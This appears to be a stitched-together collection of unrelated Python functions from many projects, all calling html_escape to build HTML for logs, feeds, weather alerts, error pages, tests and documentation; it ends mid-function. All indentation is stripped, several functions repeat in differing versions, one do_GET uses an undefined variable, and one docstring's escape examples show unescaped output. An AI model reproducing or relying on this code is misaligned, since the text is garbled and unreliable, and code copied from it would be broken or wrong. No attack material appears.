def flatten_el(el, include_hrefs, skip_tag=False):
""" Takes an lxml element el, and generates all the text chunks for
that tag. Each start tag is a chunk, each word is a chunk, and each
end tag is a chunk.
If skip_tag is true, then the outermost container tag is
not returned (just its contents)."""
if not skip_tag:
if el.tag == 'img':
yield ('img', el.get('src'), start_tag(el))
else:
yield start_tag(el)
if el.tag in empty_tags and not el.text and not len(el) and not el.tail:
return
start_words = split_words(el.text)
for word in start_words:
yield html_escape(word)
for child in el:
for item in flatten_el(child, include_hrefs=include_hrefs):
yield item
if el.tag == 'a' and el.get('href') and include_hrefs:
yield ('href', el.get('href'))
if not skip_tag:
yield end_tag(el)
end_words = split_words(el.tail)
for word in end_words:
yield html_escape(word)
def convert_to_html(self, line: str) -> str:
"""Convert style tags to html"""
chunks = tag_split_re.split(line)
if len(chunks) == 1:
# optimization in case there are no markup tags in the text at all
return html_escape(self.smartquotes(line), False)
result = []
close_tags_stack = []
chunks.append("</>") # add a reset-all-styles sentinel
for chunk in chunks:
html_tags = style_tags_html.get(chunk)
if html_tags:
chunk = html_tags[0]
close_tags_stack.append(html_tags[1])
elif chunk == "</>":
while close_tags_stack:
result.append(close_tags_stack.pop())
continue
elif chunk == "<clear>":
self.append_html_special("clear")
elif chunk:
if chunk.startswith("</"):
chunk = "<" + chunk[2:]
html_tags = style_tags_html.get(chunk)
if html_tags:
chunk = html_tags[1]
if close_tags_stack:
close_tags_stack.pop()
else:
# normal text (not a tag)
chunk = html_escape(self.smartquotes(chunk), False)
result.append(chunk)
return "".join(result)
def assert_not_in_resps(n, resps):
posts_resp, archive_resp = resps
self.assertNotIn(html_escape(title.format(n)), posts_resp.data)
self.assertNotIn(text.format(n), posts_resp.data)
self.assertNotIn(slug.format(n), posts_resp.data)
self.assertNotIn(html_escape(title.format(n)), archive_resp.data)
self.assertNotIn(slug.format(n), archive_resp.data)
def _format_label(self, fmt, strokes, translation):
if strokes:
strokes = ', '.join(self._special_fmt % html_escape('/'.join(s))
for s in sort_steno_strokes(strokes))
if translation:
translation = self._special_fmt % html_escape(escape_translation(translation))
return fmt.format(strokes=strokes, translation=translation)
def doLog(self, irc, channel, notice, nick, s, *args):
''' notice: Boolean. True if message should be styled as a notice. '''
if not self.registryValue('enable', channel):
return
s = format(s, *args)
channel = self.normalizeChannel(irc, channel)
log = self.getLog(irc, channel)
row_classes = row_class
if notice:
row_classes = row_class + " " + notice_class
log.write('<p class="%s">' % row_classes)
if self.registryValue('timestamp', channel):
log.write('<span class="%s">' % timestamp_class)
self.timestamp(log)
log.write('</span>')
if nick != None:
log.write('<span class="%s">' % nick_class)
log.write(html_escape("<%s> " %nick))
log.write('</span>')
if self.registryValue('stripFormatting', channel):
s = ircutils.stripFormatting(s)
log.write('<span class="%s">' % message_class)
log.write(self.linkify(html_escape(s)))
log.write('</span>')
log.write('</p>\n')
if self.registryValue('flushImmediately'):
log.flush()
def escape_attribute(value: EscapableEntity) -> str:
"""Escape HTML attributes.
For example: replace '"' with '"', '<' with '<'.
This code is slow. Works on str and unicode without changing
the type. Also works on things that can be converted with '%s'.
Args:
value:
Examples:
>>> escape_attribute("Hello this is <b>dog</b>!")
'Hello this is <b>dog</b>!'
>>> escape_attribute("Hello this is <foo>dog</foo>!")
'Hello this is <foo>dog</foo>!'
Returns:
"""
attr_type = type(value)
if value is None:
return ''
if attr_type == int:
return str(value)
if isinstance(value, HTML):
return str(value) # This is HTML code which must not be escaped
if isinstance(attr_type, str):
return html_escape(value, quote=True)
if isinstance(attr_type, bytes): # TODO: Not in the signature!
return html_escape(ensure_str(value), quote=True)
# TODO: What is this case for? Exception?
return html_escape(str(value), quote=True) # TODO: Not in the signature!
def generate_html_redirect_page(target_url, msg='', delay_sec=1):
"""生成一个HTML重定向页面
某些浏览器在301/302页面不接受cookies, 所以需要用html重定向页面来传cookie
:type target_url: str
:type msg: str
:type delay_sec: int
:rtype: Response
"""
resp_content = r"""<!doctype html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>重定向 (Page Redirect)</title>
<meta http-equiv="refresh" content="%d; url=%s">
<script>setTimeout(function(){location.href="%s"} , %d000);</script>
</head>
<body>
<pre>%s</pre>
<hr />
You are now redirecting to <a href="%s">%s</a>, if it didn't redirect automatically, please click that link.
</body>
</html>""" % (
delay_sec, html_escape(target_url), html_escape(target_url), delay_sec + 1,
html_escape(msg), html_escape(target_url), html_escape(target_url)
)
resp_content = resp_content.encode('utf-8')
return Response(response=resp_content)
def get_jabbers(self, uri, uri2=None):
''' return a text and html variant for Jabber stuff '''
res = []
if len(self.lsrs) == 0:
return res
wfo = self.source[1:]
url = self.get_url(uri)
for mylsr in self.lsrs:
if mylsr.duplicate:
continue
time_fmt = "%-I:%M %p"
url = "%s#%s/%s/%s" % (uri, mylsr.wfo,
mylsr.utcvalid.strftime("%Y%m%d%H%M"),
mylsr.utcvalid.strftime("%Y%m%d%H%M"))
if mylsr.valid.day != self.utcnow.day:
time_fmt = "%-d %b, %-I:%M %p"
xtra = dict(product_id=self.get_product_id(),
channels="LSR%s,LSR.ALL,LSR.%s" %
(mylsr.wfo, mylsr.typetext.replace(" ", "_")),
geometry='POINT(%s %s)' %
(mylsr.get_lon(), mylsr.get_lat()),
ptype=mylsr.get_dbtype(),
valid=mylsr.utcvalid.strftime("%Y%m%dT%H:%M:00"),
category='LSR',
twitter="%s %s" % (mylsr.tweet(), url),
lat=str(mylsr.get_lat()),
long=str(mylsr.get_lon()))
html = ("<p>%s [%s Co, %s] %s <a href=\"%s\">reports %s</a> at "
"%s %s -- %s</p>") % (
_mylowercase(mylsr.city), mylsr.county.title(),
mylsr.state, mylsr.source, url, mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), self.z,
html_escape(mylsr.remark))
plain = "%s [%s Co, %s] %s reports %s at %s %s -- %s %s" % (
_mylowercase(mylsr.city), mylsr.county.title(),
mylsr.state, mylsr.source, mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), self.z,
html_escape(mylsr.remark), url)
res.append([plain, html, xtra])
if self.is_summary():
extra_text = ""
if self.duplicates > 0:
extra_text = (", %s out of %s reports were previously "
"sent and not repeated here.") % (
self.duplicates, len(self.lsrs))
text = "%s: %s issues Summary Local Storm Report %s %s" % (
wfo, wfo, extra_text, url)
html = ("<p>%s issues "
"<a href='%s'>Summary Local Storm Report</a>%s</p>") % (
wfo, url, extra_text)
xtra = {
'product_id': self.get_product_id(),
'channels': 'LSR%s' % (wfo, ),
}
res.append([text, html, xtra])
return res
def test_feed(self):
rv = self.client.get('/feed/')
self.assertEqual(rv.status_code, 200)
perpage = self.client.application.config['POST_FEED_PERPAGE']
title = '<h1>This</h1> is Title {0}'
text = '<span>this</span> is text {0}'
slug = 'this-is-slug-{0}'
self.login_as_admin()
for n in range(perpage + 3, 0, -1):
self.add_post(title=title.format(n),
text=text.format(n),
slug=slug.format(n))
user = self.logout()
author_name = user['name']
rv = self.client.get('/feed/')
self.assertEqual(rv.status_code, 200)
# make sure it renders the first POST_FEED_PERPAGE posts only
for n in range(perpage + 3, 0, -1):
if n <= perpage:
self.assertIn(html_escape(title.format(n)), rv.data)
self.assertIn(html_escape(text.format(n)), rv.data)
self.assertIn(slug.format(n), rv.data)
self.assertIn(author_name, rv.data)
else:
self.assertNotIn(html_escape(title.format(n)), rv.data)
self.assertNotIn(html_escape(text.format(n)), rv.data)
self.assertNotIn(slug.format(n), rv.data)
def flatten_el(el, include_hrefs, skip_tag=False, skipped_elements=[]):
""" Takes an lxml element el, and generates all the text chunks for
that tag. Each start tag is a chunk, each word is a chunk, and each
end tag is a chunk.
If skip_tag is true, then the outermost container tag is
not returned (just its contents)."""
if el in skipped_elements:
yield skipped_tag(el)
return
if not skip_tag:
if el.tag == 'img':
yield ('img', el.get('src'), start_tag(el))
else:
yield start_tag(el)
if el.tag in empty_tags and not el.text and not len(el) and not el.tail:
return
start_words = split_words(el.text)
for word in start_words:
yield html_escape(word)
for child in el:
for item in flatten_el(child,
include_hrefs=include_hrefs,
skipped_elements=skipped_elements):
yield item
if el.tag == 'a' and el.get('href') and include_hrefs:
yield ('href', el.get('href'))
if not skip_tag:
yield end_tag(el)
end_words = split_words(el.tail)
for word in end_words:
yield html_escape(word)
def format_item(name: str, error: str) -> str:
return """ <li class="argument">
<span class="argument-name">{name}</span>:
<span class="error-message">{error}</span>
</li>
""".format(
name=html_escape(name), error=html_escape(error)
)
def _format_label(self, fmt, strokes, translation):
if strokes:
strokes = ', '.join(self._special_fmt % html_escape('/'.join(s))
for s in sort_steno_strokes(strokes))
if translation:
translation = self._special_fmt % html_escape(
escape_translation(translation))
return fmt.format(strokes=strokes, translation=translation)
def _listobjs(self, objs, name):
if objs:
yield "<p>{} {}(s):</p>".format(len(objs), name)
yield "<ul>"
for o in sorted(objs, key=attrgetter("name")):
title = html_escape(o.name)
url = html_escape("{}/{}".format(self.url, url_escape(o.name)))
yield '<li><a href="{}">{}</a></li>'.format(url, title)
yield "</ul><br/>"
def get_html_link(url, text, link_type=None):
attrs = ''
if link_type == 'pdf':
attrs = ' target="_blank"'
html = dedent("""\
<a href="{url}"{attrs}>
{text}</a>""".format(attrs=attrs, text=html_escape(text),
url=html_escape(url)))
return html
def _format_label(self, fmt, strokes, translation=None, filename=None):
if strokes:
strokes = ', '.join(self._special_fmt % html_escape('/'.join(s))
for s in sort_steno_strokes(strokes))
if translation:
translation = self._special_fmt_bold % html_escape(escape_translation(translation))
if filename:
filename = html_escape(filename)
return fmt.format(strokes=strokes, translation=translation, filename=filename)
def _str_sample_term(term, query_info):
if "inline_query" in query_info:
original_iq = query_info["inline_query"]
sub_dict = {
k: v
for (k,
v) in zip(query_info["query"][0][0].args, term.args)
}
return "[%s]" % html_escape(str(original_iq.apply(sub_dict)))
else:
return html_escape(str(term))
def list_users():
# Make sure that every user in he user_email_pref table also has a
# a user name in user_prefs table. We can probably find a better place
# to put this.
c = cfg.pdk_db.execute(
" SELECT DISTINCT username FROM user_email_pref WHERE "
" username NOT IN ( SELECT username FROM user_prefs ) ")
for x, in c:
print("user %s not in user_prefs table - adding<br>" % html_escape(x))
cfg.pdk_db.execute(
"INSERT INTO user_prefs ( username ) VALUES ( :1 )", (x,))
cfg.pdk_db.commit()
# Make a table showing all the user prefs.
tb = text_table.text_table()
tb.define_column('username')
tb.define_column('email')
row = 0
# find all the project names that anybody knows about. This list is
# only chosen from those projects that somebody has asked to get email
# about, so it can look in the user preferences instead of searching all
# the results for project names.
project = []
c = cfg.pdk_db.execute(
"SELECT DISTINCT project FROM user_email_pref ORDER BY project")
for (x,) in c:
project.append(x)
tb.define_column('p.' + x, showname=x)
# for each user, add a row to the table
c = cfg.pdk_db.execute(
"SELECT username, email FROM user_prefs ORDER BY username")
for user, email in c:
# stuff the fixed material into the table
tb.set_value(row, 0, user)
tb.set_value(row, 1, email)
# find for each project that this user has a preference about:
c1 = cfg.pdk_db.execute(
"SELECT project, format, maxlines FROM user_email_pref WHERE username = :1",
(user,
))
for p, f, m in c1:
# stuff that preference into the table.
if m is not None:
f = '%s %s' % (f, m)
tb.set_value(row, 'p.' + p, html_escape(f))
row = row + 1
tb.set_html_table_attributes('border=1')
output.write(tb.get_html())
def put(self, entry, path):
self.stream.write('<item><title>')
title, entry = entry.lstrip('\n').split('\n', 1)
self.stream.write(html_escape(title.format(**{'title':NOPFmt()}))) # FIXME: Assumes title is the first nonblank line
self.stream.write('</title>\n<description>\n')
entry = entry.replace('\n\n', '\n<br/>\n')
entry = entry.format(**colors.make_html_colors_dict())
entry = html_escape(entry)
self.stream.write(entry)
self.stream.write('</description>\n<link>https://www.themanaworld.org/news-feed.php#' + url_escape(path) + '</link>\n<guid isPermaLink="false">')
self.stream.write(path)
self.stream.write('</guid>\n</item>\n')
def html_quote(value, force=True):
if not force and hasattr(value, '__html__'):
return value.__html__()
if value is None:
return ''
if not isinstance(value, basestring_):
value = coerce_text(value)
if isinstance(value, bytes):
value = html_escape(value.decode('latin1'), 1)
value = value.encode('latin1')
else:
value = html_escape(value, 1)
return value
def to_html(self, with_body=True, stylesheet="css/style.css"):
html = []
for cell in self.book["cells"]:
if cell["cell_type"] == "markdown":
md = "".join(cell["source"])
if md:
html.append(markdown.markdown(md.strip()))
if cell["cell_type"] == "code":
source = "".join(cell["source"])
if source and "NotebookConverter" not in source:
html.append(self.python_to_html(source))
if cell.get("outputs"):
for output in cell["outputs"]:
if "text/html" in output.get("data", {}):
outp = "".join(output["data"]["text/html"])
if outp:
html.append(self._fix_html(outp))
elif "text/plain" in output.get("data", {}):
outp = "".join(output["data"]["text/plain"])
if outp:
html.append(
'<div class="output"><pre>%s</pre></div>' %
html_escape(outp))
if "text" in output:
outp = "".join(output["text"])
if outp:
html.append(
'<div class="output"><pre>%s</pre></div>' %
html_escape(outp))
#print("------", output)
html = "\n".join("<!-- output #%s -->\n%s\n" % t
for t in enumerate(html))
if with_body:
html = """
<!doctype html>
<html>
<head profile="http://www.w3.org/2005/10/profile">
<meta charset="utf-8">
<link href="css/highlight.css" rel="stylesheet" type="text/css" />
<link href="%s" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="page">
%s
</div>
</body>
</html>""" % (stylesheet, html)
return html
def pisaErrorDocument(dest, c):
out = pisaTempFile(capacity=c.capacity)
out.write("<p style='background-color:red;'><strong>%d error(s) occured:</strong><p>" % c.err)
for mode, line, msg, _ in c.log:
if mode == "error":
out.write("<pre>%s in line %d: %s</pre>" %
(mode, line, html_escape(msg)))
out.write("<p><strong>%d warning(s) occured:</strong><p>" % c.warn)
for mode, line, msg, _ in c.log:
if mode == "warning":
out.write("<p>%s in line %d: %s</p>" %
(mode, line, html_escape(msg)))
return pisaDocument(out.getvalue(), dest, raise_exception=False)
def convertDesc(val, encode=True):
if val is not None:
if encode is True:
if PY3:
return html_escape(val, quote=True).replace(u'\x8a', '\n')
else:
return html_escape(six.text_type(val, 'utf_8', errors='ignore').encode('utf_8', 'ignore'), quote=True).replace(u'\x8a', '\n')
else:
# remove control chars
val = removeBadChars(six.ensure_binary(val))
if PY3:
return val.decode('utf_8', errors='ignore')
else:
return six.text_type(val, 'utf_8', errors='ignore').encode('utf_8', 'ignore')
return val
def write_result(self, url_data):
"""Write url_data.result."""
if url_data.valid:
self.write(u'<tr><td class="valid">')
self.write(self.part("result"))
self.write(u'</td><td class="valid">')
self.write(html_escape(_("Valid")))
else:
self.write(u'<tr><td class="error">')
self.write(self.part("result"))
self.write(u'</td><td class="error">')
self.write(html_escape(_("Error")))
if url_data.result:
self.write(u": " + html_escape(url_data.result))
self.writeln(u"</td></tr>")
def flagok(key_id, trans_id):
c = pdk_db.execute(
'SELECT host, location, test_name FROM result_scalar WHERE key_id = :1 ',
(key_id, ))
x = c.fetchone()
if x is None:
noflag('key_id ' + str(key_id), 'no such key_id')
return 1
(host, location, test_name) = x
c = pdk_db.execute(
'SELECT value FROM result_tda WHERE key_id = :1 AND name = :2 ',
(key_id, '_okfile'))
x = c.fetchone()
if x is None:
flagok_file = None
else:
(flagok_file, ) = x
if flagok_file is None or flagok_file == '':
noflag(test_name, 'no _okfile tda')
return 1
if location is None or location == '':
noflag(test_name, 'location not known')
return 1
if host is None or host == '':
noflag(test_name, 'host not known')
return 1
if not os.path.isabs(flagok_file):
# os.path.join ignores the directory if the filename is full qualified
flagok_file = os.path.join(os.path.dirname(location), flagok_file)
flagfile = pandokia.cfg.flagok_file % host
print(
"OK %s %s %s<br>" %
(html_escape(str(test_name)), html_escape(str(flagok_file)), flagfile))
pdk_db.execute("update result_scalar set attn = 'N' where key_id = :1 ",
(key_id, ))
pdk_db.execute(
"INSERT INTO ok_items (key_id, trans_id, status) values (:1, :2, :3)",
(key_id, trans_id, 'new'))
def html_quote(value, force=True):
if not force and hasattr(value, '__html__'):
return value.__html__()
if value is None:
return ''
if not isinstance(value, basestring_):
value = coerce_text(value)
if sys.version >= "3" and isinstance(value, bytes):
value = html_escape(value.decode('latin1'), 1)
value = value.encode('latin1')
else:
value = html_escape(value, 1)
if sys.version < "3":
if is_unicode(value):
value = value.encode('ascii', 'xmlcharrefreplace')
return value
def handle_error(self, request, status=500, exc=None, message=None):
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection."""
self.log_exception("Error handling request", exc_info=exc)
if status == 500:
msg = "<h1>500 Internal Server Error</h1>"
if self.debug:
with suppress(Exception):
tb = traceback.format_exc()
tb = html_escape(tb)
msg += '<br><h2>Traceback:</h2>\n<pre>'
msg += tb
msg += '</pre>'
else:
msg += "Server got itself in trouble"
msg = ("<html><head><title>500 Internal Server Error</title>"
"</head><body>" + msg + "</body></html>")
else:
msg = message
resp = Response(status=status, text=msg, content_type='text/html')
resp.force_close()
# some data already got sent, connection is broken
if request.writer.output_size > 0 or self.transport is None:
self.force_close()
return resp
def do_GET(self):
# Default message if we don't know a name.
message = "I don't know you yet!"
# Look for a cookie in the request.
if 'cookie' in self.headers:
try:
# 2. Extract and decode the cookie.
# Get the cookie from the headers and extract its value
# into a variable called 'name'.
# Craft a message, escaping any HTML special chars in name.
message = "Hey there, " + html_escape(name)
except (KeyError, cookies.CookieError) as e:
message = "I'm not sure who you are!"
print(e)
# First, send a 200 OK response.
self.send_response(200)
# Then send headers.
self.send_header('Content-type', 'text/html; charset=utf-8')
self.end_headers()
# Send the form with the message in it.
mesg = form.format(message)
self.wfile.write(mesg.encode())
def get_jabbers(self, uri, uri2=None):
"""Return plain text and html variants for a Jabber msg
Args:
uri (str): URL number one needed for constructing the URI
uri2 (str): not used, but needed for the over-ride
Returns:
(list): List of lists, plain text, html text, xtra dict
"""
# convert htmlentities
spcuri = html_escape(self.get_url())
center = 'Storm Prediction Center'
pextra = ''
if self.afos == 'FFGMPD':
center = 'Weather Prediction Center'
pextra = 'Precipitation '
prob_extra = " "
if self.watch_prob is not None:
prob_extra = " [watch probability: %.0f%%] " % (self.watch_prob,)
plain = ("%s issues Mesoscale %sDiscussion #%s%s%s"
) % (center, pextra, self.discussion_num, prob_extra, spcuri)
html = ('<p>%s issues <a href="%s">'
'Mesoscale %sDiscussion #%s</a>%s'
'(<a href="%s?pid=%s">View text</a>)</p>'
) % (center, spcuri, pextra, self.discussion_num,
prob_extra, uri, self.get_product_id())
channels = self.get_channels()
channels.extend(["%s.%s" % (self.afos, w) for w in self.attn_wfo])
channels.extend(["%s.%s" % (self.afos, w) for w in self.attn_rfc])
channels.extend(["%s.%s" % (self.afos, w) for w in self.cwsus])
xtra = dict(channels=",".join(channels),
product_id=self.get_product_id(),
twitter=self.tweet())
return [[plain, html, xtra], ]
def graved_global_link(reference, object_, path, linker):
"""
Converts the given graved global reference link to it's html text form.
Parameters
----------
reference : `str`
A reference, what's link should be clickable.
object_ : ``UnitBase`` instance
The respective object.
path : ``QualPath``
Path of the respective object to avoid incorrect link generation in subclasses.
linker : `func`
Function, which creates a relative link between two units.
Returns
-------
html : `str`
"""
reference_escaped = html_escape(reference)
referred_object = object_.lookup_reference(reference)
if referred_object is None:
return '<code>' '<span>' f'{reference_escaped}' '</span>' '</code>'
url = linker(path, referred_object.path)
return (f'<a href="{url}">'
'<code>'
'<span>'
f'{reference_escaped}'
'</span>'
'</code>'
'</a>')
def do_GET(self):
# Default message if we don't know a name.
message = "I don't know you yet!"
# Look for a cookie in the request.
if 'cookie' in self.headers:
try:
# 2. Extract and decode the cookie.
# Get the cookie from the headers and extract its value
c = cookies.SimpleCookie(self.headers['cookie'])
name = c['yourname'].value
# Craft a message, escaping any HTML special chars in name.
message = "Hey there, " + html_escape(name)
except (KeyError, cookies.CookieError) as e:
message = "I'm not sure who you are!"
print(e)
# First, send a 200 OK response.
self.send_response(200)
# Then send headers.
self.send_header('Content-type', 'text/html; charset=utf-8')
self.end_headers()
# Send the form with the message in it.
mesg = form.format(message)
self.wfile.write(mesg.encode())
def _input(self, environ, parameters, start_response):
session = environ["wsgi.session"]
conn = session.get("player_connection")
if not conn:
return self.internal_server_error_500(start_response, "not logged in")
# Get the action the user wants to perform. If the user is logging in this will contain the
# username and password provided so 'action' is a bit of a misnomer is some edge cases.
action = parameters.get("input", "")
action = html_escape(action, False)
if action:
# Allows us to support the 'input-noecho' input form and refrain from sending passwords
# back to the browser.
if conn.io.dont_echo_next:
conn.io.dont_echo_next = False
# We always echo the user's input back to their client wrapped with tags the client can
# use to determine who best to handle user input history. The exception is when the input-noecho
# form is used to mask passwords.
else:
conn.io.html_to_browser.append("<userinput>%s</userinput>" % action)
# Save the input to the player object associated with the connection
conn.player.store_input_line(action)
start_response('200 OK', [('Content-Type', 'text/plain')])
return []
def handle_error(self, request, status=500, exc=None, message=None):
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection."""
self.log_exception("Error handling request", exc_info=exc)
if status == 500:
msg = "<h1>500 Internal Server Error</h1>"
if self.debug:
with suppress(Exception):
tb = traceback.format_exc()
tb = html_escape(tb)
msg += '<br><h2>Traceback:</h2>\n<pre>'
msg += tb
msg += '</pre>'
else:
msg += "Server got itself in trouble"
msg = ("<html><head><title>500 Internal Server Error</title>"
"</head><body>" + msg + "</body></html>")
else:
msg = message
resp = Response(status=status, text=msg, content_type='text/html')
resp.force_close()
# some data already got sent, connection is broken
if request.writer.output_size > 0 or self.transport is None:
self.force_close()
return resp
def html_quote(value, force=True):
if not force and hasattr(value, '__html__'):
return value.__html__()
if value is None:
return ''
if not isinstance(value, basestring_):
value = coerce_text(value)
if sys.version >= "3" and isinstance(value, bytes):
value = html_escape(value.decode('latin1'), 1)
value = value.encode('latin1')
else:
value = html_escape(value, 1)
if sys.version < "3":
if is_unicode(value):
value = value.encode('ascii', 'xmlcharrefreplace')
return value
def do_GET(self):
message = "I don't know your age!"
# Look for a cookie in the request.
if 'cookie' in self.headers:
try:
c = cookies.SimpleCookie(self.headers['cookie'])
age = c['age'].value
# Craft a message, escaping any HTML special chars in name.
message = "Hey there, your age is " + html_escape(age)
except (KeyError, cookies.CookieError) as e:
message = "I'm not sure about your age!"
print(e)
# First, send a 200 OK response.
self.send_response(200)
# Then send headers.
self.send_header('Content-type', 'text/html; charset=utf-8')
self.end_headers()
# Send the form with the message in it.
mesg = form.format(message)
self.wfile.write(mesg.encode())
def _escape(self, text):
"""Escape text according to self.escape"""
ret = EMPTYSTRING if text is None else str(text)
if self.escape:
return html_escape(ret)
else:
return ret
def _make_ancestor_tree(self, person):
"""Make SVG picture for parent tree.
Parameters
----------
person : `ged4py.model.Individual`
INDI record
Returns
-------
html : `list` [ `str` ]
SVG data (HTML contents), list of strings.
"""
width = self._page_width ^ 'px'
tree = AncestorTree(person, max_gen=self._tree_width, width=width, gen_dist="12pt", font_size="9pt")
visitor = SVGTreeVisitor(units='px', fullxml=False)
tree.visit(visitor)
img = visitor.makeSVG(width=tree.width, height=tree.height)
doc = []
if img is not None:
tree_svg = img[0]
hdr = self._tr.tr(TR("Ancestor tree"))
doc += ['<h3>' + html_escape(hdr) + '</h3>\n']
doc += ['<div class="centered">\n']
doc += [tree_svg]
doc += ['</div>\n']
else:
doc += ['<svg width="100%" height="1pt"/>\n']
return doc
def get_back_path(unit):
parts = [(unit.name, '#')]
counter = 1
while True:
unit = unit.parent
if unit is None:
break
parts.append((unit.name, '../' * counter + quote(unit.name)))
counter += 1
continue
result = []
index = len(parts) - 1
while True:
name, url = parts[index]
result.append('<a href="')
result.append(url)
result.append('">')
result.append(html_escape(name))
result.append('</a>')
if index == 0:
break
index -= 1
result.append(' / ')
continue
return ''.join(result)
def serialize(self):
"""
Serializes the attribute section to html string parts.
This method is a generator.
Yields
------
html : `str`
"""
path = self.path
name = path.parts[-1]
prefix = get_anchor_prefix_for(path)
tier = get_tier_for(path)
yield '<h'
yield str(tier)
yield '>'
yield from anchor_for_serializer(anchor_escape(prefix))
yield html_escape(name)
yield '<div class="underline"><div></h'
yield str(tier)
yield '>'
if tier > 1:
yield '<div class="sub_unit">'
for section in self.sections:
yield from section.serialize()
if tier > 1:
yield '</div>'
return
def get_jabbers(self, uri=None, uri2=None):
""" get jabber messages """
res = []
for report in self.reports:
if report.is_duplicate or report.valid is None:
continue
jmsg = {'priority':
'Urgent' if report.priority == 'UUA' else 'Routine',
'ts': report.valid.strftime("%H%M"),
'report': html_escape(report.text),
'color':
'#ff0000' if report.priority == 'UUA' else '#00ff00'}
plain = "%(priority)s pilot report at %(ts)sZ: %(report)s" % jmsg
html = ("<span style='color:%(color)s;'>%(priority)s pilot "
"report</span> at %(ts)sZ: %(report)s") % jmsg
xtra = {'channels':
'%s.%s,%s.PIREP' % (report.priority, report.cwsu,
report.priority),
'geometry': 'POINT(%s %s)' % (report.longitude,
report.latitude),
'ptype': report.priority,
'category': 'PIREP',
'twitter': plain[:140],
'valid': report.valid.strftime("%Y%m%dT%H:%M:00")}
res.append([plain, html, xtra])
return res
def afterFlowable(self, flowable):
# Does the flowable contain fragments?
if getattr(flowable, "outline", False):
self.notify('TOCEntry', (
flowable.outlineLevel,
html_escape(copy.deepcopy(flowable.text), 1),
self.page))
def html_escape_context(context: Dict[str, str]) -> Dict[str, str]:
unescaped_variables = {
"CONTACTALIAS",
"CONTACTNAME",
"CONTACTEMAIL",
"PARAMETER_INSERT_HTML_SECTION",
"PARAMETER_BULK_SUBJECT",
"PARAMETER_HOST_SUBJECT",
"PARAMETER_SERVICE_SUBJECT",
"PARAMETER_FROM_ADDRESS",
"PARAMETER_FROM_DISPLAY_NAME",
"PARAMETER_REPLY_TO",
"PARAMETER_REPLY_TO_ADDRESS",
"PARAMETER_REPLY_TO_DISPLAY_NAME",
}
if context.get("SERVICE_ESCAPE_PLUGIN_OUTPUT") == "0":
unescaped_variables |= {"SERVICEOUTPUT", "LONGSERVICEOUTPUT"}
if context.get("HOST_ESCAPE_PLUGIN_OUTPUT") == "0":
unescaped_variables |= {"HOSTOUTPUT", "LONGHOSTOUTPUT"}
return {
variable:
html_escape(value) if variable not in unescaped_variables else value
for variable, value in context.items()
}
def write(self, html):
html.write("<ul>\n")
for k, v in self.contents.items():
html.write("<li><code>%s</code>\n" % k)
if isinstance(v, Directory):
html.write("<strong>%s</strong>\n" % v.count)
v.write(html)
else:
a, rel, b = v
html.write(
"<div>\n<p><code>%s</code> %s <code>%s</code></p>\n" %
(a["url"], rel, b["url"]))
for side in [a, b]:
html.write("<img src='data:image/png;base64,%s'>\n" %
side["screenshot"])
url = side["url"]
prefix = "/_mozilla/"
if url.startswith(prefix):
filename = "mozilla/tests/" + url[len(prefix):]
elif url == "about:blank":
src = ""
filename = None
else:
filename = "web-platform-tests" + url
if filename:
with open(filename, encoding="utf-8") as f:
src = html_escape(f.read())
html.write(
"<pre><code class=language-html>%s</code></pre>\n" %
src)
html.write("</li>\n")
html.write("</ul>\n")
def start_tag(el):
"""
The text representation of the start tag for a tag.
"""
return '<%s%s>' % (
el.tag, ''.join([' %s="%s"' % (name, html_escape(value, True))
for name, value in el.attrib.items()]))
def makeHtmlNodes(nodes, sgg, prefixes, local, root_iri, root):
htmlNodes = {}
for k, v in nodes.items():
if ':' in k and not k.startswith('http') and not k.startswith('file'):
prefix, suffix = k.split(':')
prefix = prefix.strip('\x1b[91m') # colors :/
if sgg is not None and not suffix and k == root: # FIXME 268
url = os.path.join(sgg._basePath, 'vocabulary', 'id',
quote(root_iri, safe=[]))
#root_iri.replace('/','%2F').replace('#','%23'))
elif sgg is not None and local:
url = os.path.join(sgg._basePath, 'vocabulary', 'id', k)
elif prefix == '_' and v is None:
log.warning(f'BLANK NODES HAVE ENTERED THE DATABASE {root_iri}')
v = 'BLANK NODE'
else:
try:
url = str(prefixes[prefix]) + suffix
except KeyError as e:
log.exception(e)
url = k
else:
if sgg is not None and local:
url = os.path.join(sgg._basePath, 'vocabulary', 'id',
quote(k, safe=[]))
#k.replace('/','%2F').replace('#','%23'))
else:
url = k
if v is None: # if there is no label fail over to the url
v = f'<{url}>'
htmlNodes[k] = '<a target="_blank" href="{}">{}</a>'.format(url, html_escape(v))
return htmlNodes
def _render_section(self, level, ref_id, title, newpage=False):
# docstring inherited from base class
self._toc += [(level, ref_id, title)]
doc = ['<h{0} id="{1}">{2}</h{0}>\n'.format(level, ref_id,
html_escape(title))]
for line in doc:
self._output.write(line.encode('utf-8'))
def file_ul(request):
sess = DBSession()
try:
ff_id = request.POST['ffid']
except KeyError:
ff_id = None
folder = None
if ff_id:
ff_id = int(ff_id)
folder = sess.query(FileFolder).get(ff_id)
if folder and not folder.can_write(request.user):
raise ValueError('Folder access denied')
for fo in request.POST.getall('file'):
obj = File(
user_id=request.user.id,
user=request.user,
group_id=request.user.group.id,
group=request.user.group,
rights=F_DEFAULT_FILES
)
if fo.filename:
obj.name = obj.filename = fo.filename
obj.folder = folder
sess.add(obj)
obj.set_from_file(fo.file, request.user, sess)
res = Response(html_escape(json.dumps({
'success' : True,
'msg' : 'File(s) uploaded'
}), False))
res.headerlist.append(('X-Frame-Options', 'SAMEORIGIN'))
return res
def commenter_link(self, obj):
if obj is None or not obj.pk:
return "(None)"
return '<a href="/admin/blog/commenter/{}/">{}</a>'.format(
obj.commenter.pk,
html_escape(obj.commenter.ip_hash),
)
def render_html(self):
if self.body is None:
return ""
data = self.render_data
for k, v in iteritems(data):
if k != "code":
data[k] = html_escape(v)
return self.body.safe_substitute(data)
def start_tag(el):
"""
The text representation of the start tag for a tag.
"""
split_text = split_whitespace(el.text or "")[1][0]
return '<%s%s>%s' % (
el.tag, ''.join([' %s="%s"' % (name, html_escape(value, True))
for name, value in el.attrib.items()]),
split_text)
def generate_heading(self, fun):
"""Generate a heading for the top of the iprofile."""
if fun is None:
heading = "<h3>Summary</h3>"
else:
try:
heading = "{} (Calls: {}, Time: {})"
heading = heading.format(fun.co_name,
